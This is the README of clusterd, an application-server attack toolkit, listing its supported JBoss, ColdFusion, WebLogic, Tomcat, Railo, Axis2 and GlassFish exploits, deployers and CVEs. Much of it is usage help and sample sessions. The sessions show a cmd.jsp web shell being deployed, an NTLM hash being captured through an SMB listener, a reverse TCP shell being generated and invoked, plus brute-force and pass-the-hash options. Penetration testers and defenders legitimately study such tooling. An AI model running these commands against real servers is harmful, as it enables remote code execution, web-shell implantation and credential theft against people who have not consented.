clusterd is an open source application server attack toolkit. Born out of frustration with current fingerprinting and exploitation methods, clusterd automates the fingerprinting, reconnaissance, and exploitation phases of an application server attack. See the wiki for more information.
- Python >= 2.7.x
- Requests >= 2.2.x
The recommended installation of clusterd is to clone the Github repository
git clone
clusterd currently supports six different application server platforms, with several more currently in development and research phases
- Versions 3.x - 8.1
- Currently supported deployers:
- /jmx-console/MainDeployer for 3.x, 4.x, and 6.x
- /jmx-console/DeploymentFileRepository for 3.x, 4.x, and 5.x
- /web-console/Invoker (MainDeployer) for 3.x, 4.x, and 6.x
- /web-console/Invoker (BSHDeployer) for 3.x and 4.x
- /invoker/JMXInvokerServlet for 3.x, 4.x, and 5.x
- /invoker/EJBInvokerServlet for 3.x, 4.x, and 5.x
- /management for 7.x, 8.x
- SEAM2 for 5.1, 6.x
- Dump deployed WARs
- Fetch host OS information
- Verb tampering vulnerability (CVE-2010-0738)
- Credential/path disclosure (CVE-2005-2006)
- Versions 5 - 11
- Currently supported deployers:
- Task Scheduler for 5.x, 6.x, 7.x, 8.x, 9.x, 10.x, and 11.x
- FCKeditor for 8.x
- LFI Log Injection 6.x, 7.x, and 8.x
- Hash retrieval for versions 6 - 10
- RDS admin bypass (CVE-2013-0632)
- Pass the hash authentication for versions 7 - 9
- Versions 7, 8.1, 11, and 12
- Deployer over T3 and T3S currently tested against 11.x and 12.x
- Dump deployed WARs over T3/T3S
- Fetch host OS information
- Versions 3.x - 8.x
- Currently can deploy to all versions with an exposed manager interface
- Dump deployed WARs
- Fetch host OS information
- Versions 3.x - 4.x
- Currently supported deployers:
- Task scheduler for 3.x and 4.x
- Log injection for 3.x and 4.x
- Thumbnail pre-auth RCE for 3.x and 4.x (up to 4.2.1)
- Fetch host OS information
- Pre-auth Password retrieval for 3.x - 4.2.1
- Versions 1.4 - 1.6
- Currently supported deployers:
- Admin interface for 1.4, 1.5, and 1.6
- Fetch host OS information
- View deployed services
- Credential disclosure for 1.4
- Versions 3.x - 4.x
- View deployed services
- Currently supported deployers:
- Admin upload for 3.x and 4.x
Simple API for adding new platforms, fingerprints, deployers, and exploits
Various auxiliary modules for vulnerabilities and exploitation techniques
$ ./
clusterd/0.3.1 - clustered attack toolkit
[Supporting 7 platforms]
usage: ./ [options]
optional arguments:
-h, --help show this help message and exit
Options for configuring the connection
-i [ip address] Server address
-iL [file] Server list
-p [port] Server port
--proxy [proxy://server:port]
Connect through proxy [http|https]
--proxy-auth [username:password]
Proxy credentials
--timeout [seconds] Connection timeout [5s]
--random-agent Use a random User-Agent for requests
--ssl Force SSL
Remote Host:
Settings specific to the remote host
-a [jboss|coldfusion|weblogic|tomcat|railo|axis2|glassfish]
Hint at remote host service
-o [windows|linux] Hint at remote host OS
-v [version] Specific version to test
--usr-auth [username:password]
Login credentials for service
--fingerprint Fingerprint the remote system
--arch [x86|x64] Specify remote OS architecture
Deployment flags and settings
--deploy [file] Deploy to the discovered service
--undeploy [context] Undeploy file from server
--deployer [deployer]
Specify a deployer to use
--invoke Invoke payload after deployment
--rand-payload Use a random name for the deployed file
-b [user] Brute force credentials for user [admin]
--wordlist [path] Wordlist for brute forcing passwords
Miscellaneous flags
--deployer-list List all available deployers
--aux-list [platform]
List all available exploits
--gen-payload [host:port] for reverse connection
Generate a reverse shell payload
--discover [discovery_file]
Attempt to discover application servers using the
specified nmap gnmap output (use -sV when scanning)
--listen [adapter] Adapter to listen on when needed
-d Enable debug output
-l Log output to file [$time$_log.log]
jboss fingerprint and host info
$ ./ -i -a jboss --jb-info --random-agent
clusterd/0.3 - clustered attack toolkit
[Supporting 6 platforms]
[2014-05-25 10:57PM] Started at 2014-05-25 10:57PM
[2014-05-25 10:57PM] Servers' OS hinted at windows
[2014-05-25 10:57PM] Fingerprinting host ''
[2014-05-25 10:57PM] Server hinted at 'jboss'
[2014-05-25 10:57PM] Checking jboss version 3.2 JBoss JMX Console...
[2014-05-25 10:57PM] Checking jboss version 3.2 JBoss Web Console...
[2014-05-25 10:57PM] Checking jboss version 3.0 JBoss JMX Console...
[2014-05-25 10:57PM] Checking jboss version 4.2 JBoss JMX Console...
[2014-05-25 10:57PM] Checking jboss version 4.2 JBoss Web Console...
[2014-05-25 10:57PM] Checking jboss version 4.0 JBoss JMX Console...
[2014-05-25 10:57PM] Checking jboss version 4.0 JBoss Web Console...
[2014-05-25 10:57PM] Checking jboss version 5.1 JBoss Web Manager...
[2014-05-25 10:57PM] Checking jboss version 5.1 JBoss JMX Console...
[2014-05-25 10:57PM] Checking jboss version 5.1 JBoss Web Console...
[2014-05-25 10:57PM] Checking jboss version 5.0 JBoss JMX Console...
[2014-05-25 10:57PM] Checking jboss version 5.0 JBoss Web Console...
[2014-05-25 10:57PM] Checking jboss version 6.0 JBoss Web Manager...
[2014-05-25 10:57PM] Checking jboss version 6.1 JBoss Web Manager...
[2014-05-25 10:57PM] Checking jboss version 6.1 JBoss JMX Console...
[2014-05-25 10:57PM] Checking jboss version 6.0 JBoss JMX Console...
[2014-05-25 10:57PM] Checking jboss version 7.1 JBoss Management...
[2014-05-25 10:57PM] Checking jboss version 7.0 JBoss Management...
[2014-05-25 10:57PM] Checking jboss version 8.0 JBoss Management...
[2014-05-25 10:57PM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2014-05-25 10:57PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
[2014-05-25 10:57PM] Checking jboss version Any JBoss JMX Invoker Servlet...
[2014-05-25 10:57PM] Checking jboss version Any JBoss RMI Interface...
[2014-05-25 10:57PM] Checking jboss version Any JBoss Status Page...
[2014-05-25 10:57PM] Matched 7 fingerprints for service jboss
[2014-05-25 10:57PM] JBoss JMX Console (version 5.0)
[2014-05-25 10:57PM] JBoss Web Console (version 5.0)
[2014-05-25 10:57PM] JBoss EJB Invoker Servlet (version Any)
[2014-05-25 10:57PM] JBoss HTTP Headers (Unreliable) (version 5.0)
[2014-05-25 10:57PM] JBoss JMX Invoker Servlet (version Any)
[2014-05-25 10:57PM] JBoss RMI Interface (version Any)
[2014-05-25 10:57PM] JBoss Status Page (version Any)
[2014-05-25 10:57PM] Fingerprinting completed.
[2014-05-25 10:57PM] Attempting to retrieve JBoss info...
[2014-05-25 10:57PM] ActiveThreadCount: 68
[2014-05-25 10:57PM] AvailableProcessors: 1
[2014-05-25 10:57PM] OSArch: amd64
[2014-05-25 10:57PM] MaxMemory: 518979584
[2014-05-25 10:57PM] HostAddress:
[2014-05-25 10:57PM] JavaVersion: 1.7.0_45
[2014-05-25 10:57PM] OSVersion: 6.1
[2014-05-25 10:57PM] TotalMemory: 286703616
[2014-05-25 10:57PM] JavaVendor: Oracle Corporation
[2014-05-25 10:57PM] ActiveThreadGroupCount: 9
[2014-05-25 10:57PM] OSName: Windows 7
[2014-05-25 10:57PM] FreeMemory: 122651808
[2014-05-25 10:57PM] HostName: bryan-PC
[2014-05-25 10:57PM] JavaVMVersion: 24.45-b08
[2014-05-25 10:57PM] JavaVMVendor: Oracle Corporation
[2014-05-25 10:57PM] JavaVMName: Java HotSpot(TM) 64-Bit Server VM
[2014-05-25 10:57PM] Finished at 2014-05-25 10:57PM
jboss DFS deployment against JBoss 5.0
$ ./ -i -a jboss -v5.0 --deploy ./src/lib/resources/cmd.war --random-agent
clusterd/0.3 - clustered attack toolkit
[Supporting 6 platforms]
[2014-05-25 11:00PM] Started at 2014-05-25 11:00PM
[2014-05-25 11:00PM] Servers' OS hinted at windows
[2014-05-25 11:00PM] Fingerprinting host ''
[2014-05-25 11:00PM] Server hinted at 'jboss'
[2014-05-25 11:00PM] Checking jboss version 5.0 JBoss JMX Console...
[2014-05-25 11:00PM] Checking jboss version 5.0 JBoss Web Console...
[2014-05-25 11:00PM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2014-05-25 11:00PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
[2014-05-25 11:00PM] Checking jboss version Any JBoss JMX Invoker Servlet...
[2014-05-25 11:00PM] Checking jboss version Any JBoss RMI Interface...
[2014-05-25 11:00PM] Checking jboss version Any JBoss Status Page...
[2014-05-25 11:00PM] Matched 7 fingerprints for service jboss
[2014-05-25 11:00PM] JBoss JMX Console (version 5.0)
[2014-05-25 11:00PM] JBoss Web Console (version 5.0)
[2014-05-25 11:00PM] JBoss EJB Invoker Servlet (version Any)
[2014-05-25 11:00PM] JBoss HTTP Headers (Unreliable) (version 5.0)
[2014-05-25 11:00PM] JBoss JMX Invoker Servlet (version Any)
[2014-05-25 11:00PM] JBoss RMI Interface (version Any)
[2014-05-25 11:00PM] JBoss Status Page (version Any)
[2014-05-25 11:00PM] Fingerprinting completed.
[2014-05-25 11:00PM] This deployer requires a JSP, default to cmd.jsp? [Y/n] >
[2014-05-25 11:00PM] Preparing to deploy cmd...
[2014-05-25 11:00PM] Successfully deployed '/cmd/cmd.jsp'
[2014-05-25 11:00PM] Finished at 2014-05-25 11:00PM
jboss UNC hash retrieval
$ sudo ./ -i -a jboss -v4.2 --random-agent --jb-smb
clusterd/0.3 - clustered attack toolkit
[Supporting 6 platforms]
[2014-05-25 11:01PM] Started at 2014-05-25 11:01PM
[2014-05-25 11:01PM] Servers' OS hinted at windows
[2014-05-25 11:01PM] Fingerprinting host ''
[2014-05-25 11:01PM] Server hinted at 'jboss'
[2014-05-25 11:01PM] Checking jboss version 4.2 JBoss JMX Console...
[2014-05-25 11:01PM] Checking jboss version 4.2 JBoss Web Console...
[2014-05-25 11:01PM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2014-05-25 11:01PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
[2014-05-25 11:01PM] Checking jboss version Any JBoss JMX Invoker Servlet...
[2014-05-25 11:01PM] Checking jboss version Any JBoss RMI Interface...
[2014-05-25 11:01PM] Checking jboss version Any JBoss Status Page...
[2014-05-25 11:01PM] Matched 7 fingerprints for service jboss
[2014-05-25 11:01PM] JBoss JMX Console (version 4.2)
[2014-05-25 11:01PM] JBoss Web Console (version 4.2)
[2014-05-25 11:01PM] JBoss EJB Invoker Servlet (version Any)
[2014-05-25 11:01PM] JBoss HTTP Headers (Unreliable) (version 4.2)
[2014-05-25 11:01PM] JBoss JMX Invoker Servlet (version Any)
[2014-05-25 11:01PM] JBoss RMI Interface (version Any)
[2014-05-25 11:01PM] JBoss Status Page (version Any)
[2014-05-25 11:01PM] Fingerprinting completed.
[2014-05-25 11:01PM] Setting up SMB listener..
[2014-05-25 11:01PM] Invoking UNC loader...
[2014-05-25 11:01PM] bryan::bryan-PC:1122334455667788:34826253d353ebca4811bd08be0db067:01010000000000003dac35999f78cf019df7c49c7268a5f600000000020000000000000000000000
[2014-05-25 11:01PM] Finished at 2014-05-25 11:01PM
tomcat deployment and reverse shell invocation
$ ./ -i -a tomcat -v 5.5 --gen-payload --deploy shell.war --invoke --rand-payload -o windows
clusterd/0.3 - clustered attack toolkit
[Supporting 6 platforms]
[2014-05-25 10:53PM] Started at 2014-05-25 10:53PM
[2014-05-25 10:53PM] Generating payload....
[2014-05-25 10:53PM] Payload generated (shell.war). Payload: java/jsp_shell_reverse_tcp
[2014-05-25 10:53PM] Servers' OS hinted at windows
[2014-05-25 10:53PM] Fingerprinting host ''
[2014-05-25 10:53PM] Server hinted at 'tomcat'
[2014-05-25 10:53PM] Checking tomcat version 5.5 Tomcat...
[2014-05-25 10:53PM] Checking tomcat version 5.5 Tomcat Manager...
[2014-05-25 10:53PM] Matched 2 fingerprints for service tomcat
[2014-05-25 10:53PM] Tomcat (version 5.5)
[2014-05-25 10:53PM] Tomcat Manager (version 5.5)
[2014-05-25 10:53PM] Fingerprinting completed.
[2014-05-25 10:53PM] Preparing to deploy /tmp/.clusterd/z1dgi.war...
[2014-05-25 10:53PM] Deployed /tmp/.clusterd/z1dgi.war to /z1dgi
[2014-05-25 10:53PM] z1dgi invoked at
[2014-05-25 10:53PM] Finished at 2014-05-25 10:53PM